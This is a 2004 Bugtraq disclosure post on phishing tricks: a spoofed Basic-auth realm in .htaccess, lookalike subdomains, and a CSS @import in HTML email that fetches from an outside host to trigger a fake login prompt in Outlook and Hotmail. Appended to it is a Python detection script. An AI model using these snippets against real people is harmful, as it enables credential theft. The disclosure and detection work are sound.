Bugtraq mailing list archives

Stupid Phishing Tricks


From: "http-equiv () excite com" <1 () malware com>
Date: Fri, 21 May 2004 13:46:47 -0000



Phriday, May 21, 2004

Several pheeble yet interesting phishing possibilities arise as 
phollows:

Take one .htaccess trivially modified to suit the target 
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
 </STYLE>

1. Outlook Express

[screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style sheet' works on outbound [reply to] [so 
much for not downloading external content] inbound can be 
achieved as well via http://securityfocus.com/bid/10369 which 
has an even more convincing network login applet

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint : hotmail[and other] web designer people; off-set the html 
login form on the site as many prime banks have done.

The possibilities are obviously endless.


BE AWARE OF THE SHARKS OUT THERE


NB: anyone have any contact or connection to the upper 
management security or abuse dept. of one public company called: 
SAVVIS Communications. http://savvis.net/ it appears their abuse 
dept. is woefully negligent in attending to abuse affairs.


End Call

-- 
http://www.malware.com
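
Added example, not part of the original post: a mail-gateway style check in Python for the two tricks described above. It lists the remote stylesheets an HTML message would make the client fetch and flags hosts that carry a protected name as a subdomain label. The sample message, the `.example` host names and the function names are constructed for this example, and treating the last two host labels as the registered domain is a simplifying assumption.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches '@import url(http://...)' and '@import "http://..."' in CSS text.
IMPORT_RE = re.compile(r"""@import\s*(?:url\(\s*)?["']?\s*([^"')\s;]+)""", re.I)

class StyleRefs(HTMLParser):
    """Collect URLs that CSS in an HTML body would make the mail client fetch."""
    def __init__(self):
        super().__init__()
        self.urls, self.in_style = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "style":
            self.in_style = True
        elif tag == "link" and "stylesheet" in (a.get("rel") or "").lower():
            self.urls.append(a.get("href") or "")
    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
    def handle_data(self, data):
        if self.in_style:
            self.urls += IMPORT_RE.findall(data)

def remote_style_refs(raw_message):
    """Return http(s) stylesheet URLs in the text/html parts of a raw message."""
    found = []
    for part in message_from_string(raw_message).walk():
        if part.get_content_type() == "text/html":
            p = StyleRefs()
            p.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
            found += [u for u in p.urls if urlparse(u).scheme in ("http", "https")]
    return found

def brand_in_subdomain(url, brands):
    """True if a protected name is a host label left of the last two labels.
    Assumption: the last two labels are the registered domain (no suffix list)."""
    labels = (urlparse(url).hostname or "").lower().split(".")
    return any(b in labels[:-2] for b in brands)

# Constructed sample message; the host name is made up for this example.
SAMPLE = ("Content-Type: text/html\n\n<STYLE type=text/css>\n"
          "@import url( http://www.evenlargerbank.money.throwaway.example/s );\n"
          "</STYLE>hello\n")
if __name__ == "__main__":
    for u in remote_style_refs(SAMPLE):
        print(u, brand_in_subdomain(u, {"evenlargerbank"}))
```
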




